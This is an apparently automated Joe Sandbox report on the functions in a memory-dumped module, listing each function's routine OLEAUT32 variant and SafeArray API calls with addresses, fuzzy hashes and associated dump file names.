Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
String ID:
API String ID: 214056513-0
Opcode ID: 2a3fa55f71bef58db08ecc5ce9b7c0ce84046d041caebe34b548cabdcb82b45b
Instruction ID: c49db98d5570c65746aa6086c31ee8a5fb02289ee0d588293ff46de404efa090
Opcode Fuzzy Hash: 2a3fa55f71bef58db08ecc5ce9b7c0ce84046d041caebe34b548cabdcb82b45b
Instruction Fuzzy Hash: 3DC16A716083459FD704CFA8C884A5ABBE8BFC9304F108D9EF595CB261C779E845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F88AF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6F88AF75
VariantInit.OLEAUT32(?), ref: 6F88AF7C
VariantInit.OLEAUT32(?), ref: 6F88AF83
VariantCopy.OLEAUT32(?,?), ref: 6F88B00D
VariantClear.OLEAUT32(?), ref: 6F88B027
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F88B19C
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F88B1AA
SafeArrayAccessData.OLEAUT32(?,?), ref: 6F88B1C5
_memmove.LIBCMT ref: 6F88B1E6
SafeArrayUnaccessData.OLEAUT32(?), ref: 6F88B1EF
VariantClear.OLEAUT32(?), ref: 6F88B237
VariantClear.OLEAUT32(?), ref: 6F88B23E
VariantClear.OLEAUT32(?), ref: 6F88B245
VariantClear.OLEAUT32(?), ref: 6F88B29D
VariantClear.OLEAUT32(?), ref: 6F88B2A4
VariantClear.OLEAUT32(?), ref: 6F88B2AB

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
String ID:
API String ID: 3403836469-0
Opcode ID: 8558200f230eb0d8e80f94d3005227068ab6091b3e047c2768d50bc438a6983d
Instruction ID: c1f54ffcce4cfabdb29bc52e514b7b839cbdcd96fc4beb76290857323da8ae01
Opcode Fuzzy Hash: 8558200f230eb0d8e80f94d3005227068ab6091b3e047c2768d50bc438a6983d
Instruction Fuzzy Hash: ADC148B2604345AFD704DFA8C88495AB7E9FFC9304F1049AEF669CB291D730E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F89D410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6F89D4B3
VariantInit.OLEAUT32 ref: 6F89D4C5
VariantInit.OLEAUT32(?), ref: 6F89D4CC
_malloc.LIBCMT ref: 6F89D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F89D58B
SafeArrayCreateVector.OLEAUT32 ref: 6F89D5A6
SafeArrayAccessData.OLEAUT32 ref: 6F89D5B8

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
String ID:
API String ID: 1552365394-0
Opcode ID: 01bbdc9a313d7605bf57bd12a82d482c35ecc7489465ced95e81fc99dea62738
Instruction ID: 71ba270a9304182189003b41086dc0939fcdd952ff6d2c9abfe77b68f0454096
Opcode Fuzzy Hash: 01bbdc9a313d7605bf57bd12a82d482c35ecc7489465ced95e81fc99dea62738
Instruction Fuzzy Hash: 8CB14776608301AFD314CF28C880A5BB7E9FFC9314F14899EE8959B351E730E945CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6F89D468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6F89D4B3
VariantInit.OLEAUT32 ref: 6F89D4C5
VariantInit.OLEAUT32(?), ref: 6F89D4CC
_malloc.LIBCMT ref: 6F89D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F89D58B
SafeArrayCreateVector.OLEAUT32 ref: 6F89D5A6
SafeArrayAccessData.OLEAUT32 ref: 6F89D5B8
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F89D601
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F89D63E

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
String ID:
API String ID: 2723946344-0
Opcode ID: 8109b2966db43739eec3386ac9af2720ad29be080f7fe271ab71cafe35aea7e7
Instruction ID: 4227e19a778d594a314f5c2637f8564f163608488a1a98a1b9d4dba669cdfb9b
Opcode Fuzzy Hash: 8109b2966db43739eec3386ac9af2720ad29be080f7fe271ab71cafe35aea7e7
Instruction Fuzzy Hash: A69146B6608301AFD714CF28C980E5AB7F6BFC9314F14899DE8958B251D730E945CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6F895140 Relevance: 21.2, APIs: 14, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6F895177

Part of subcall function 6F8A2820: _malloc.LIBCMT ref: 6F8A2871

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6F8951B9
SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6F8951D5
SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6F8951E5
_memmove.LIBCMT ref: 6F8951FF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F895208
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F89522C
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6F895263
VariantClear.OLEAUT32(?), ref: 6F89526C
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6F8952AD
VariantClear.OLEAUT32(?), ref: 6F8952B6
SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6F8952D2
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F89534E
VariantClear.OLEAUT32(?), ref: 6F895358

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
String ID:
API String ID: 452649785-0
Opcode ID: d2e8ecf3444495971aa0c5791691b4a04c357328e81a73bf30c92c5b8604752a
Instruction ID: 6f4737c5eca538f4f44731bd2eab3ebc752340882c3fe2a6cfcb4a64db2d1c68
Opcode Fuzzy Hash: d2e8ecf3444495971aa0c5791691b4a04c357328e81a73bf30c92c5b8604752a
Instruction Fuzzy Hash: 01713C71A0060AEFDB04CFA9C884EAFBBB8FF49354F00455AE905DB240E774E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F8944C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6F8944FF
VariantInit.OLEAUT32(?), ref: 6F894505
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F894516
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F894551
VariantClear.OLEAUT32(?), ref: 6F89455A
SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6F894579
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F894594
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6F8945B5
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6F8945CE
std::tr1::_Xweak.LIBCPMT ref: 6F89475A
SafeArrayDestroy.OLEAUT32(?), ref: 6F894777
VariantClear.OLEAUT32(?), ref: 6F894787
VariantClear.OLEAUT32(?), ref: 6F89478D

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
String ID:
API String ID: 1304965753-0
Opcode ID: fd611a8fdec0692898ed06324e6d38cbc8ecd677049d72bda73f33c9a4f23940
Instruction ID: d92608f00aebb2824a870c0c4023344afc0ce4c46cdbcb5530938c5dc997b1fe
Opcode Fuzzy Hash: fd611a8fdec0692898ed06324e6d38cbc8ecd677049d72bda73f33c9a4f23940
Instruction Fuzzy Hash: 25A12D75A01209AFDB14DF98C984EAFB7B9BF8D710F14466DE506AB781C630F941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F89BF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6F89BF3D
VariantInit.OLEAUT32(?), ref: 6F89BF4A
VariantInit.OLEAUT32(?), ref: 6F89BF50
VariantInit.OLEAUT32(?), ref: 6F89BF56
VariantInit.OLEAUT32 ref: 6F89C04D
VariantCopy.OLEAUT32(?,?), ref: 6F89C054
VariantInit.OLEAUT32 ref: 6F89C085
VariantCopy.OLEAUT32(?,?), ref: 6F89C08C
VariantClear.OLEAUT32(?), ref: 6F89C118
VariantClear.OLEAUT32(?), ref: 6F89C11E
VariantClear.OLEAUT32(?), ref: 6F89C124
VariantClear.OLEAUT32(?), ref: 6F89C12A

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 8fcba1d222ce8a92079d71fd0df398eacb6c3ae9f5ba5feb8c71f6e52e763d9a
Instruction ID: 590b2679841fd555173806a52105a673ba3a66a7c3f43171d2493330c72b2056
Opcode Fuzzy Hash: 8fcba1d222ce8a92079d71fd0df398eacb6c3ae9f5ba5feb8c71f6e52e763d9a
Instruction Fuzzy Hash: 56818C71900219AFDF04DFA8CD80FEEBBB9FF49304F144999E505AB281DB35A905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F8964D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6F89650C
VariantInit.OLEAUT32(?), ref: 6F896519
VariantInit.OLEAUT32(?), ref: 6F896520
SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6F896531
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F89656D
VariantClear.OLEAUT32(?), ref: 6F896576
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F8965B6
VariantClear.OLEAUT32(?), ref: 6F8965BF
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F896666
VariantClear.OLEAUT32(?), ref: 6F896677
VariantClear.OLEAUT32(?), ref: 6F89667E
VariantClear.OLEAUT32(?), ref: 6F896685

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: d7b566730328f203e38a70e9dafb3fd2ba87b3eefb703c940d93f5cff2fac342
Instruction ID: d0639e80bf2377c3055ba18957db877b842f36ff85fd803b886a822c8f65413b
Opcode Fuzzy Hash: d7b566730328f203e38a70e9dafb3fd2ba87b3eefb703c940d93f5cff2fac342
Instruction Fuzzy Hash: 5D5129725087059FC701DF68C880E5BBBE8EFCA710F00895EF9658B250EB71E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F89CB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6F89CBCA
VariantInit.OLEAUT32(?), ref: 6F89CBD3
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F89CBE4
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F89CBF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F89CC0D
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6F89CC39
VariantClear.OLEAUT32(?), ref: 6F89CC42
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6F89CC5D
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6F89CC77
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F89CCEC
VariantClear.OLEAUT32(?), ref: 6F89CCFC
VariantClear.OLEAUT32(?), ref: 6F89CD02

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
String ID:
API String ID: 3548156019-0
Opcode ID: e99a081eb10409c9543bb4c00b2b8a0cada0588f20164628b9a6500135feb723
Instruction ID: 0286fe0c916a0efea9d7bb59583409dd8f54ed7aa0a3537b1ce66a632f2be5b3
Opcode Fuzzy Hash: e99a081eb10409c9543bb4c00b2b8a0cada0588f20164628b9a6500135feb723
Instruction Fuzzy Hash: B55131B5D0024AAFDB04DFA8C884EDEBFB8FF49714F00855AE915A7341D771A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F88A350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6F88A393
VariantInit.OLEAUT32(?), ref: 6F88A39A
VariantInit.OLEAUT32(?), ref: 6F88A3A1
VariantCopy.OLEAUT32(?,?), ref: 6F88A3EF
VariantClear.OLEAUT32(?), ref: 6F88A409
VariantClear.OLEAUT32(?), ref: 6F88A50A
VariantClear.OLEAUT32(?), ref: 6F88A511
VariantClear.OLEAUT32(?), ref: 6F88A518
VariantClear.OLEAUT32(?), ref: 6F88A55E
VariantClear.OLEAUT32(?), ref: 6F88A565
VariantClear.OLEAUT32(?), ref: 6F88A56C

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$Init$Copy
String ID:
API String ID: 3214764494-0
Opcode ID: 6d64095ce8afd6cd36f6095edfd99245b9621c0b9af39a98fea652eab374b9cf
Instruction ID: d9a2d08217d0bb1c9a7b056cc5666ea075e8dac53f2f21e6215162275a3f4854
Opcode Fuzzy Hash: 6d64095ce8afd6cd36f6095edfd99245b9621c0b9af39a98fea652eab374b9cf
Instruction Fuzzy Hash: 54715A72608341AFD704DF69C880A5BB7E8FF89710F008A9EF655DB291D730E805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6F8966A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6F8966DB
VariantInit.OLEAUT32 ref: 6F8966EA
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F896700
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F89673A
VariantClear.OLEAUT32(?), ref: 6F896747
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F896787
VariantClear.OLEAUT32(?), ref: 6F896794
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F896849
VariantClear.OLEAUT32(?), ref: 6F89685A
VariantClear.OLEAUT32(?), ref: 6F896861

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
String ID:
API String ID: 551789342-0
Opcode ID: a79a11c7500331420d60e2571bf03de3317ed36a65c9b3f447dfce5bdd35d6a3
Instruction ID: bc57c1dbe0e948ef4089d6887a40e257e39808d8a840ce2e2880d8cd22820fc2
Opcode Fuzzy Hash: a79a11c7500331420d60e2571bf03de3317ed36a65c9b3f447dfce5bdd35d6a3
Instruction Fuzzy Hash: 7E513976509605AFC700CF68C944E9BBBE9EFCA714F008A9AF9559B250D730E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F89840E Relevance: 13.8, APIs: 9, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F8984BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F8984D2
SafeArrayGetElement.OLEAUT32 ref: 6F89850A

Part of subcall function 6F893A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F893B71
Part of subcall function 6F893A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F893B83

Part of subcall function 6F8969C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F896A08
Part of subcall function 6F8969C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F896A15
Part of subcall function 6F8969C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F896A41

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Part of subcall function 6F88DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F88DFF6
Part of subcall function 6F88DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F88E003
Part of subcall function 6F88DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F88E02F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
